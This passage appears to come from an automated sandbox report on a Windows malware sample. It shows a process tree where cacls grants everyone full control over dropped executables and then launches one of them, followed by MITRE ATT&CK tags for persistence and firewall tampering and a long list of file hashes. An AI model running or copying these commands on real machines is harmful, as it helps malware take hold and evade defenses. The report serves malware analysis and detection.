C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F1⤵PID:5756
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:3916
-
-
C:\Windows\system32\cacls.execacls C:\Windows\meqvcrkb\zienqub.exe /p everyone:F2⤵PID:2308
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\zienqub.exe1⤵PID:3308
-
C:\Windows\ime\zienqub.exeC:\Windows\ime\zienqub.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5348
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F1⤵PID:5032
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵PID:4036
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\mknctelvt\hnembi.exe /p everyone:F2⤵PID:5308
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵PID:608
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
44.0MB
MD50ef407e4bb4476360e4b9597f73ba0eb
SHA12ab72059a23dd17f34dee994b785b1b445384b51
SHA256933a4169e2434201580833696cfe7e6ff573dd71a5d3108091aee7ad1d5a79f6
SHA512cec6b8bcdafdfe5aac6121aae99b2f1b7a1ac7bd8051bf9345f4e554038ac558c5e17204ecb686256b2c94538d43d9de92f7157db5ece3bb91b34a45441693b9
-
Filesize
26.4MB
MD57cb8fd6f9fdf829c8ee94089bc7e8b4d
SHA1a20fdd42baf468cff90869b4f4916bc417abfe37
SHA256e8362118699f15f91bff4fc49bd2e125cde54b820a0b5bc40d5e76aaf6b3a52b
SHA5128cbd704f1d4609504bb6c60ddafb5634dd32209380cb975a831902eb7cc27485480ea9bff9dd7af9394d79fdb8f41267527befe9b6108d479eabdf6a668af435
-
Filesize
8.7MB
MD5242954c7502688c0a25cc382379b9bf6
SHA1f2aab13326ce362dd373960afb237c721b2b2b3d
SHA256be669009972f8fcd46af66d7564e158cbf6600e11f3b1b74b8104276750fad43
SHA512e263b6d11868089178af287216ddd7f416299e8292a0f8d9d0ada021a3f91d472b759ca8dbe04dfe9fc6703281ba3b92ff59866f307bcad3d127840dc8f12364
-
Filesize
4.1MB
MD58460dda4bc4f90728650060316d4885d
SHA144b89b4309344fefbea64fe37b1b2143d3b5af3b
SHA2560337adf0f807c9df69215c9a4e467ff2c0292c4bb937b702ee750cc9ae04656b
SHA512c26529b41abc9cfc497b93a3caf69ceb87550ed357da4e0c25b8233520ac4aaf71fff1cc2a644bdc2a6c897249e486e727bb6136e1a8c27539268304c7b97a96
-
Filesize
4.1MB
MD5f3dccaac1af44d0e198fbe9e2aa91fed
SHA11135aaaf50866e7a97d0f8172cd821749334c8e8
SHA256ce86ed4d85f13d13a8bfea7ac6106449db0c789c07d23d599d7c29b909180774
SHA5124edf3c132b9d6f2a9744bbf9e9afe57a6d67b00a821eddd1e650068ee245728e377620af217a1a88c94e5e97d0a754dc0a9ee75badfae681ea9968e6d20b0ec5
-
Filesize
3.0MB
MD5b5e5469df1ec45e72d7808bdfc93ae22
SHA1e71e5d62ba5fc0f14c670163eaf2677679eaeb0f
SHA256ef76d5255b05f881653ba8b1f24b92bfa92e53ad478df4bd30e39c0d9bc0d8c0
SHA512b356901bdcdbcad990adb3e16398fb37285710eba8bd860fcabc1ebb29a04274b8057adf1a2853532fade5022cd87a761c2fe3848e01583bf52a3fab50d11886
-
Filesize
7.5MB
MD55f087004bdd4878922f88bbcb8ccf9bc
SHA13912b6a77c838de01d06c5dfd026676d5ecab5f2
SHA25616137b964affc61ad9c209dadc0494132c5e6fae15cd7333cefde3b2a8e5d8f6
SHA512c1bbb0d21cd72e674ce843f527714e78f0813ba83e499bc1b10f18f56f8eae57c1b7d609ba8cce73a77c63262e75feb90d849fc66d1b25456f071fb073d58211
-
Filesize
818KB
MD58f71639ea5a61e533dcff192f5be1f9e
SHA11d35e29e2d5e99dacd116f567083c106dc0364c4
SHA25676aa3c40c467cd9aca5a74f5a618dc5cc6ea2879c3f462eaf792ca243a042e2d
SHA512f58d5ca29cdc8bcc57ad3768ee52da66a77e7aceb3f4b8e687ca5372f510fc6934744aa30623b6a3ec8d2e1f27edb38e92036012e1ace8eed9c08b0115c185b4
-
Filesize
33.7MB
MD58043e3d2d4b6365b6d2f4c9100883bef
SHA15bfabefca1bed79d0ecdbb3084e802aecb384bad
SHA2565614ffdfba2357192a13a8d0e9445752796d0cdf3d8258239894224826f913c6
SHA512a7d13f356165c93eba66d3e5418bc96d6c24c392df0ea3559e4c3022e49cc5fdaac1db9fdedce411bc492679168e5240c1cb0a933cf544fb2f549a26fa737f6d
-
Filesize
2.4MB
MD598440e58cfd500ef2f8fb9c76db59700
SHA12e2052210b5f32c0a8a3872e0ab61c7ba4dcf28d
SHA2566de43a3c468945a41321dfeb6c5a757459959440533aae3d1e286a6d021d1b11
SHA512011805dffc73f8994857394cc75c9a57efe67181d8a0a4e7056d03f77911186c6df3d90b570791fcc9568089adae3a0da32b63d38cbb42388fc44035a87f9922
-
Filesize
21.0MB
MD58ba3c0e2992ae0bcd03ba781c22c852c
SHA1df9ddcb0bf445f6c73b59923ee9619b3e48a5bcf
SHA2562e41e1b2a1e71003520e9dbcb4ceff53e1c75ed5bfcf1f059fae28c92bd560da
SHA51221fa0d5c63b5a289142b215b0e3f66187b4f7adf44dee1185d3fa62c34aea9dd84338c328a211c372219191a9784ef02745a7f9a721172db82e958a6b54e4467
-
Filesize
4.2MB
MD59b1aab8039a6e144924cd17cb53b6b3d
SHA11013555d9e5f293a3950e6da9bfb271add7f55c7
SHA2561a2db107ddcb30d4405d2c8d8ea0e4e208186ae01ec992c1a5234d55bf81a663
SHA5128e3fc3578f5a0fd19f438038e55e2ecb9081796199031e0e2741d9b8d66bfe0555dc8529044d7da5bc387e64eda2afbc70849b7cceccf7565a0489323b2aa709
-
Filesize
1.2MB
MD581b882a350a1c3357b12a09133772e5c
SHA12a26dfe4da2d00fd0683c686f47e37f17c46e75c
SHA256e7d0e8e2c2eef881bd841ed8a38de20f3ebcc2966de7a3fa9c8d4438ddcdc050
SHA5122d3a21bd45ec3603119446e462aec9e970d99d0bec82e72c00575abe66fee61794f2adf5117eb4f14e1e1b705cf6821460095f66d0cd9cdfda602ed5def9a740
-
Filesize
1.9MB
MD5c0e0a7ec8a4b0b1d7897cdd41dca7e29
SHA1f66caab36d658aaa1d54d4dac7ebffbf65c90807
SHA2564e2d67c072f605964783b4a28d4e0f7aad05f817107799a66dae8b21c2893aec
SHA5127ce1ee1eddcc04bb9fc1fb5ae3b2d26cf6bf6928a6e6591b8f3de35c9b025858c1940214987d34cfca07f7c6a1d3c6cb3d0281ba6f0c4cd2f53ec87da8f41292
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
126KB
MD5e8d45731654929413d79b3818d6a5011
SHA123579d9ca707d9e00eb62fa501e0a8016db63c7e
SHA256a26ae467f7b6f4bb23d117ca1e1795203821ca31ce6a765da9713698215ae9af
SHA512df6bcdc59be84290f9ecb9fa0703a3053498f49f63d695584ffe595a88c014f4acf4864e1be0adf74531f62ce695be66b28cfd1b98e527ab639483802b5a37a6
-
Filesize
343KB
MD52b4ac7b362261cb3f6f9583751708064
SHA1b93693b19ebc99da8a007fed1a45c01c5071fb7f
SHA256a5a0268c15e00692a08af62e99347f6e37ee189e9db3925ebf60835e67aa7d23
SHA512c154d2c6e809b0b48cc2529ea5745dc4fc3ddd82f8f9d0f7f827ff5590868c560d7bec42636cb61e27cc1c9b4ac2499d3657262826bbe0baa50f66b40e28b616
-
Filesize
11KB
MD52ae993a2ffec0c137eb51c8832691bcb
SHA198e0b37b7c14890f8a599f35678af5e9435906e1
SHA256681382f3134de5c6272a49dd13651c8c201b89c247b471191496e7335702fa59
SHA5122501371eb09c01746119305ba080f3b8c41e64535ff09cee4f51322530366d0bd5322ea5290a466356598027e6cda8ab360caef62dcaf560d630742e2dd9bcd9
-
Filesize
6KB
MD5b648c78981c02c434d6a04d4422a6198
SHA174d99eed1eae76c7f43454c01cdb7030e5772fc2
SHA2563e3d516d4f28948a474704d5dc9907dbe39e3b3f98e7299f536337278c59c5c9
SHA512219c88c0ef9fd6e3be34c56d8458443e695badd27861d74c486143306a94b8318e6593bf4da81421e88e4539b238557dd4fe1f5bedf3ecec59727917099e90d2
-
Filesize
72KB
MD5cbefa7108d0cf4186cdf3a82d6db80cd
SHA173aeaf73ddd694f99ccbcff13bd788bb77f223db
SHA2567c65ffc83dbbbd1ec932550ea765031af6e48c6b5b622fc2076c41b8abb0fcb9
SHA512b89b6d9c77c839d0d411d9abf2127b632547476c2272219d46ba12832d5a1dab98f4010738969e905e4d791b41596473397cf73db5da43ecab23486e33b0e1d1
-
Filesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
Filesize
332KB
MD5ea774c81fe7b5d9708caa278cf3f3c68
SHA1fc09f3b838289271a0e744412f5f6f3d9cf26cee
SHA2564883500a1bdb7ca43749635749f6a0ec0750909743bde3a2bc1bfc09d088ca38
SHA5127cfde964c1c62759e3ba53c47495839e307ba0419d740fcacbeda1956dcee3b51b3cf39e6891120c72d0aae48e3ea1019c385eb5006061ced89f33b15faa8acb
-
Filesize
424KB
MD5e9c001647c67e12666f27f9984778ad6
SHA151961af0a52a2cc3ff2c4149f8d7011490051977
SHA2567ec51f4041f887ba1d4241054f3be8b5068291902bada033081eff7144ec6a6d
SHA51256f0cff114def2aeda0c2c8bd9b3abcacef906187a253ea4d943b3f1e1ca52c452d82851348883288467a8c9a09d014910c062325964bcfe9618d7b58056e1fe
-
Filesize
8.7MB
MD5d80ab31877b750c18c326c68dc64b62d
SHA1d6a6cb9c47ed1ad7ed805479ae198f653e72d104
SHA2569b3af2646d977c3896fda9daed40664001f241fa29dbc631d043c00b0344f013
SHA5122c8df1a866e4536b9fa50b33c9757cb04ba32b787c46d08ef113025e09416b387a3b8bbee7e0daf8aeea1a6d43fbe69638c145a35121ea96a145bd7029a05b49
-
Filesize
1KB
MD5c838e174298c403c2bbdf3cb4bdbb597
SHA170eeb7dfad9488f14351415800e67454e2b4b95b
SHA2561891edcf077aa8ed62393138f16e445ef4290a866bccdbb7e2d7529034a66e53
SHA512c53a52b74d19274c20dece44f46c5d9f37cd0ec28cf39cac8b26ba59712f789c14d1b10b7f5b0efdf7ce3211dda0107792cc42503faa82cb13ffae979d49d376